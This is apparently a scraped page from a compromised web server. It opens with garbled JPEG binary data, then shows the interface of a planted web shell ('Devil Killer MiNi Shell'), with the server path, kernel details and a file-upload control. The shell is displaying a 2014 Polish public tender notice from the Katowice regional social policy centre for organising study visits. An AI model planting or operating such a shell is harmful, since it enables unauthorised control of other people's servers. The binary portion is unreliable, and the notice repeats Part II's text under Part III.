JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140808/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140808/171901-N-2014.html

<p class="kh_header"><b>Katowice: ROPS.ZPP.3321.24.2014 - Kompleksowa organizacja krajowych wizyt studyjnych w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego</b><br>
<b>Numer ogłoszenia: 171901 - 2014; data zamieszczenia: 08.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego , ul Modelarska 10, 40-142 Katowice, woj. śląskie, tel. 32 730 68 68, faks 32 730 68 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ROPS.ZPP.3321.24.2014 - Kompleksowa organizacja krajowych wizyt studyjnych w ramach projektu systemowego Kształcenie i doradztwo dla kadr pomocy i integracji społecznej województwa śląskiego realizowanego przez Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na kompleksowej organizacji trzydniowych wizyt studyjnych dla 12 grup liczących do 10 uczestników każda, która obejmuje świadczenie usług transportowych, noclegowych, restauracyjnych, ubezpieczeniowych, szkoleniowych oraz organizacji wizyty, z podziałem na części:
Część I: 
2 wizyty studyjne z przewodnim tematem partnerstw na rzecz włączenia społecznego zawierające jako główne miejsce realizacji Stowarzyszenie na Rzecz Rozwoju Gminy Bałtów BAŁT. 
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu budowania partnerstw na rzecz integracji społecznej.
Część II: 
2 wizyty studyjne z przewodnim tematem wspierania przedsiębiorczości społecznej zawierające jako główne miejsce realizacji Fundację Rozwoju Przedsiębiorczości Społecznej Być Razem w Cieszynie.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu przedsiębiorczości społecznej.
Część III: 
2 wizyty studyjne z przewodnim tematem stosowania aktywnych form integracji społecznej zawierające jako główne miejsce realizacji Fundację Pomocy Wzajemnej Barka w Poznaniu.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z aktywnych form integracji społecznej.
Część IV: 
2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania spółdzielni socjalnych zawierające jako główne miejsce realizacji Spółdzielnię Socjalną Usługowo-Handlowo-Produkcyjną w Byczynie.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania spółdzielni socjalnych.
Część V: 
2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania zakładów aktywności zawodowej zawierające jako główne miejsce realizacji Zakład Aktywności Zawodowej OPOKA w Kluczach.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania zakładów aktywności zawodowej.
Część VI: 
2 wizyty studyjne z przewodnim tematem tworzenia i funkcjonowania centrów integracji społecznej zawierające jako główne miejsce realizacji Centrum Integracji Społecznej w Skarżysku-Kamiennej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu tworzenia i funkcjonowania centrów integracji społecznej.
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
Szczegółowy opis przedmiotu zamówienia znajduje się w Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia na podstawie załączonego do oferty wykazu głównych usług, stanowiącego załącznik nr 6 do SIWZ.

dla części od I do VI:
Spełnia oznacza, że wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 3 usługi polegające na przeprowadzeniu minimum 2-dniowych krajowych wizyt studyjnych dla grup co najmniej 10-osobowych o wartości łącznej minimum 15.000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonana wg formuły spełnia-nie spełnia na podstawie załączonego do oferty dokumentu pn.: Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, stanowiącego załącznik nr 7 do SIWZ.


W ramach Części I praktyczne szkolenie z zakresu budowania partnerstw na rzecz integracji społecznej winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące budowania partnerstw na rzecz integracji społecznej w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia w pracy w partnerstwie międzyinstytucjonalnym.

W ramach Części II praktyczne szkolenie z zakresu przedsiębiorczości społecznej winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące przedsiębiorczości społecznej w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia zawodowego w podmiocie ekonomii społecznej lub instytucji wspierającej podmioty ekonomii społecznej.

W ramach Części III praktyczne szkolenie z zakresu aktywnych form integracji społecznej winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące aktywnych form integracji społecznej w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia zawodowego w podmiocie zajmującym się aktywną integracją.

W ramach Części IV praktyczne szkolenie z zakresu tworzenia i funkcjonowania spółdzielni socjalnych winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące tworzenia i funkcjonowania spółdzielni socjalnych w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia zawodowego w spółdzielni socjalnej lub w instytucji wspierającej podmioty ekonomii społecznej.

W ramach Części V praktyczne szkolenie z zakresu tworzenia i funkcjonowania zakładów aktywności zawodowej winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące tworzenia i funkcjonowania zakładów aktywności zawodowej w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia zawodowego w zakładzie aktywności zawodowej lub w instytucji wspierającej podmioty ekonomii społecznej.

W ramach Części VI praktyczne szkolenie z zakresu tworzenia i funkcjonowania centrów integracji społecznej winna prowadzić osoba, która posiada:
-minimalne wykształcenie na poziomie wyższym magisterskim,
-minimum 3 przeprowadzone szkolenia/warsztaty dotyczące tworzenia i funkcjonowania centrów integracji społecznej w zakresie łącznym minimum 80 godzin dydaktycznych zajęć i/lub co najmniej 2 lata doświadczenia zawodowego w centrum integracji społecznej lub w instytucji wspierającej podmioty ekonomii społecznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W skład oferty powinny wchodzić:
a)Podpisany i wypełniony Formularz ofertowy, załącznik nr 1 do SIWZ. Oferta musi zawierać oświadczenie Wykonawcy, wskazujące te części zamówienia, których wykonanie powierzy podwykonawcom,
b)Podpisany i wypełniony Formularz cenowy, załącznik nr 2 do SIWZ,
c)Podpisany i wypełniony Program wizyty studyjnej, załącznik nr 8 do SIWZ ,
d)Wszystkie wymagane przez Zamawiającego oświadczenia i dokumenty wskazane w rozdziale VI niniejszej SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany umowy mogą nastąpić w następujących przypadkach: 
a.Zaistnienia omyłki pisarskiej,
b.Zmiany danych teleadresowych,
c.Zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy.
2.Dopuszcza się możliwość zmiany ustalonego między stronami terminu wizyt studyjnych składających się na przedmiot umowy z następujących przyczyn:
a)jeżeli w wyniku przeprowadzonej rekrutacji do udziału w wizycie studyjnej nie zostanie zakwalifikowana przynajmniej 80% grupa uczestników spełniających kryteria stawiane na etapie procesu rekrutacji,
b)jeżeli ze względu na wypadek losowy nie będzie możliwe przeprowadzenie wizyty studyjnej (w szczególności: choroba trenera, siła wyższa).
3.W szczególnie uzasadnionych wypadkach, za które Wykonawca nie ponosi odpowiedzialności, dopuszczalna jest zmiana osoby (osób) prowadzącej szkolenia podczas wizyt studyjnych, po uprzednim poinformowaniu o tym fakcie Zamawiającego, z podaniem przyczyny tejże zmiany i uzyskaniem akceptacji dla osoby (osób) wskazanej na zastępcę. Nowo wprowadzony prowadzący musi posiadać wykształcenie, kwalifikacje i doświadczenie zawodowe co najmniej równoważne z doświadczeniem zastępowanego prowadzącego.
4.Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powołał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops-katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, ul. Modelarska 10, 40-142 Katowice, pokój nr 213.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2014 godzina 10:00, miejsce: Regionalny Ośrodek Polityki Społecznej Województwa Śląskiego, ul. Modelarska 10, 40-142 Katowice, pokój nr 111.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach projektu: Kształcenie i doradztwo dla kadr pomocy i integracji społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I: 2 wizyty studyjne z przewodnim tematem partnerstw na rzecz włączenia społecznego zawierające jako główne miejsce realizacji Stowarzyszenie na Rzecz Rozwoju Gminy Bałtów BAŁT..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 wizyty studyjne z przewodnim tematem partnerstw na rzecz włączenia społecznego zawierające jako główne miejsce realizacji Stowarzyszenie na Rzecz Rozwoju Gminy Bałtów BAŁT. Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu budowania partnerstw na rzecz integracji społecznej. 
Maksymalna liczba uczestników w grupie: 10 osób. Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu budowania partnerstw na rzecz integracji społecznej - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II: 2 wizyty studyjne z przewodnim tematem wspierania przedsiębiorczości społecznej zawierające jako główne miejsce realizacji Fundację Rozwoju Przedsiębiorczości Społecznej Być Razem w Cieszynie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: 2 wizyty studyjne z przewodnim tematem wspierania przedsiębiorczości społecznej zawierające jako główne miejsce realizacji Fundację Rozwoju Przedsiębiorczości Społecznej Być Razem w Cieszynie.
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu przedsiębiorczości społecznej. 
Maksymalna liczba uczestników w grupie: 10 osób. Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu przedsiębiorczości społecznej - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - 2 wizyty studyjne z przewodnim tematem stosowania aktywnych form integracji społecznej zawierające jako główne miejsce realizacji Fundację Pomocy Wzajemnej Barka w Poznaniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 wizyty studyjne z przewodnim tematem wspierania przedsiębiorczości społecznej zawierające jako główne miejsce realizacji Fundację Rozwoju Przedsiębiorczości Społecznej Być Razem w Cieszynie.
Oprócz głównego miejsca realizacji Wykonawca zaproponuje co najmniej 4 dodatkowe miejsca/podmioty, w których zaprezentowane zostaną dobre praktyki w dziedzinie partnerstw na rzecz włączenia społecznego, stosowania aktywnych form integracji społecznej i/lub ekonomii społecznej, takich jak spółdzielnie socjalne, centra integracji społecznej, zakłady aktywności zawodowej, warsztaty terapii zajęciowej, stowarzyszenia i fundacje oraz inne instytucje działające w sektorze ekonomii społecznej lub realizujące działania w partnerstwie w obszarze polityki społecznej.
W drugim dniu wizyty Wykonawca zorganizuje praktyczne szkolenie z zakresu przedsiębiorczości społecznej. 
Maksymalna liczba uczestników w grupie: 10 osób. Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8, 55.11.00.00-4, 55.30.00.00-3, 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie trenerów prowadzących praktyczne szkolenie z zakresu aktywnych form integracji społecznej - 20</li>
<li>3. Doświadczenie Wykonawcy w realizacji wizyt studyjnych odpowiadających swoim zakresem tematyce wizyt studyjnych objętych przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
